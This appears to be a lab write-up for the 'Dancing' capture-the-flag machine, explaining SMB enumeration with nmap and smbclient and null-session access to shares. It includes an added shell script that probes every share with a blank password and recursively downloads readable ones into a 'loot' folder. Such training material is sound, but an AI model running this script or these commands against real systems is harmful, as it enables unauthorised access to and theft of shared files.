Lab Objective: Dancing is the third machine in the Starting Point Tier 0 series. It focuses on SMB — the Server Message Block protocol — which allows shared access to files, printers, and serial ports between endpoints on a network.
Important Considerations
- Port 445/TCP is where SMB listens when it runs directly over TCP, without the NetBIOS session layer that the older port 139/TCP depends on.
- Windows — SMB is predominantly a Windows protocol, deeply integrated with networking and Active Directory. Many professionals still block it at the firewall level because of its history of exploitation.
- Exploitation risk — Port 445 and SMB shares are prone to being exploited, especially when accessed remotely with misconfigured permissions. Guest accounts and anonymous log-ons, as with FTP, are a significant vulnerability.
Enumeration
As always, enumeration is the first and most critical step. We are gathering information about the target system before touching anything.
Task 1 — What does SMB stand for?
Answer: Server Message Block. A version scan identifies the service: sudo nmap -sV [IP] (add -p445 to restrict the scan to the SMB port).
Task 2 — What port does SMB use?
Answer: 445.
Task 3 — What is the service name for port 445 in the Nmap scan?
Answer: microsoft-ds.
Task 4 — What flag with smbclient lists the available shares?
Answer: -L. Install smbclient if needed: sudo apt-get install smbclient.
When smbclient connects it negotiates an authentication level with the server. Without -U it offers your local username, which will not exist on the target. In a real engagement you would have done due diligence first; here we have two options to try: a null session with -N, which sends an empty password and does not prompt, or the built-in guest account (-U guest with a blank password).
Establishing a Foothold
Task 5 — How many shares are there on Dancing?
Answer: 4. The shares are: ADMIN$, C$, IPC$, and WorkShares.
We test each share with: smbclient \\\\{targetIP}\\ADMIN$ -N (on Linux the forward-slash form smbclient //{targetIP}/ADMIN$ -N avoids the backslash escaping). The -N flag leaves the password blank; a share that rejects the null session returns NT_STATUS_ACCESS_DENIED.
Task 6 — Which share can we access with a blank password?
Answer: WorkShares.
Task 7 — What command downloads files from within the SMB shell?
Answer: get. Navigating the directory reveals two folders — Amy.J and James.P — each containing a text file.
smb: \> ls
smb: \> cd Amy.J
smb: \Amy.J\> get worknotes.txt
Task 8 — Submit the Flag.
Answer: Follow the steps above to find the flag inside the downloaded files.
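The manual steps in Tasks 4 to 7 (list shares, try each one with a blank password, pull the files out of whichever share opens) can be automated. The script below is an added example and is not part of the original write-up; it assumes smbclient is installed and takes the target IP as its only argument. The sample listing embedded in it is constructed from the share table format smbclient -L prints, so the parser can be exercised offline; the probe and download functions need the live lab.

```shell
#!/bin/sh
# Added example (not from the original write-up): enumerate SMB shares and
# probe each one with a null session, then pull readable shares to ./loot.
# Assumes: smbclient (Samba) is on PATH; argument 1 is the target IP.

set -u

# Constructed sample of `smbclient -L //IP -N` output, shaped like the real
# share table (Sharename / Type / Comment). Used only for offline parsing.
SAMPLE_LISTING='
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        WorkShares      Disk
SMB1 disabled -- no workgroup available
'

# parse_shares: read smbclient -L output on stdin, print one share name per
# line. Only rows whose second column is a share type survive, which drops the
# header, the dashed separator and the trailing status line.
parse_shares() {
    awk '$2 == "Disk" || $2 == "IPC" || $2 == "Printer" { print $1 }'
}

# list_shares TARGET: live anonymous listing (-N sends an empty password and
# never prompts), filtered down to share names.
list_shares() {
    smbclient -L "//$1" -N 2>/dev/null | parse_shares
}

# probe_share TARGET SHARE: exit 0 if a null session can open and list the
# share. -c runs one command and exits, so the exit status reflects access.
probe_share() {
    smbclient "//$1/$2" -N -c 'ls' >/dev/null 2>&1
}

# pull_share TARGET SHARE DESTDIR: Task 7's `get`, applied to every file in the
# share recursively. prompt OFF stops mget asking per file.
pull_share() {
    mkdir -p "$3"
    ( cd "$3" && smbclient "//$1/$2" -N -c 'recurse ON; prompt OFF; mget *' )
}

main() {
    target="$1"
    for share in $(list_shares "$target"); do
        if probe_share "$target" "$share"; then
            echo "[+] $share: readable with a blank password"
            pull_share "$target" "$share" "loot/$share"
        else
            echo "[-] $share: access denied"
        fi
    done
    # Whatever came down (worknotes, flag) is now under ./loot for reading.
    find loot -type f 2>/dev/null
}

# Only run against a target when one is given, so the functions above can be
# sourced and exercised offline against SAMPLE_LISTING.
if [ $# -gt 0 ]; then
    main "$1"
fi
```

Usage: sh enum_smb.sh 10.10.10.10. Expect ADMIN$, C$ and IPC$ to report access denied and WorkShares to be downloaded; the dollar-sign shares are administrative and only open to local administrators, and IPC$ accepts a null session for named pipes but has no files to list.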
Final Thoughts
- Make sure smbclient is installed and up to date before attempting this.
- Always use the help command when exploring an unfamiliar service inside the shell.
- Spend time reading documentation on what commands do. Understanding the tool is more valuable than copying the command.